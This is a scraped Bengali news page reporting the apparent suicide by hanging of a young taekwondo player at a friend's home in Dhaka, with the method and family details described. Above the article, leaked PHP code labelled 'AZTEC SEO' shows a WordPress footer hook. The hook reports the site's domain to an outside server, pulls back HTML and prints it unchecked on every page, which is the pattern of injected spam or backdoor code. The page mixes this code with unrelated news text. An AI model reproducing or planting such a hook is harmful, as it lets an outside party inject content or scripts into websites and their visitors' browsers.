/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); রাজধানীতে বান্ধবীর বাসায় যুবকের ‘আত্মহত্যা’ | Dhaka Sky News

সৌদির পর বিদেশি নাগরিকদের প্রবেশের উপর নিষেধাজ্ঞা দিলো কুয়েত

আগের সংবাদ

সিঙ্গাপুরসহ ৩ দেশে রপ্তানী হচ্ছে মেহেরপুরের বাঁধাকপি

পরের সংবাদ

রাজধানীতে বান্ধবীর বাসায় যুবকের ‘আত্মহত্যা’

ঢামেক প্রতিনিধি

প্রকাশিত: February 5, 2021 , 2:02 pm

রাজধানীর হাজারীবাগ এলাকার পুরাতন ধানমণ্ডির বসিলায় বান্ধবীর বাসা থেকে এক যুবকের লাশ উদ্ধার করা হয়েছে। নিহতের নাম মো. কামরুল ইসলাম (২৪)। সে বাংলাদেশ আনসার তায়কোয়ন্দো জাতীয় দলের খেলোয়াড় ছিল। নিহতের বান্ধবী প্রতিভাও তায়কোয়ন্দো খেলোয়াড়।

প্রতিভা জানান, কামরুল আমার ভালো বন্ধু ছিল, সে আমার বাসায় প্রায়ই আসত। গতকাল রাতে আমার বাসায় এসে পাশের রুমে ঘুমিয়ে ছিল। অনেক রাতে হঠাৎ শব্দ হওয়াতে আমি ওই রুমে গিয়ে দেখি ফ্যানের সঙ্গে ওড়না পেঁচিয়ে সে গলায় ফাঁস দিয়েছে। অচেতন অবস্থায় শুক্রবার সকাল সাড়ে ৭টায় ঢাকা মেডিকেল কলেজ হাসপাতালে নিয়ে আসলে কর্তব্যরত চিকিৎসক তাকে মৃত ঘোষণা করেন।

ঢামেক ক্যাম্পের পুলিশ পরিদর্শক বাচ্চু মিয়া জানান, মৃতদেহটি ময়নাতদন্তের জন্য হাসপাতাল মর্গে রাখা হয়েছে।

নিহতের সহকর্মী পলাশ জানান, বাড়ি যাওয়ার কথা বলে দুদিন আগে কামরুল ফেডারেশন থেকে ছুটি নিয়েছিল। আজ খবর পাই, সে আত্মহত্যা করেছে।

কামরুল চট্টগ্রাম জেলার কর্ণফুলী উপজেলার সিকোন বাজারের মৃত আবদুল করিমের ছেলে। দুই ভাই এক বোনের মধ্যে তিনি ছিলেন ছোট। বর্তমানে ঢাকার ফকিরাপুলে থাকতেন তিনি।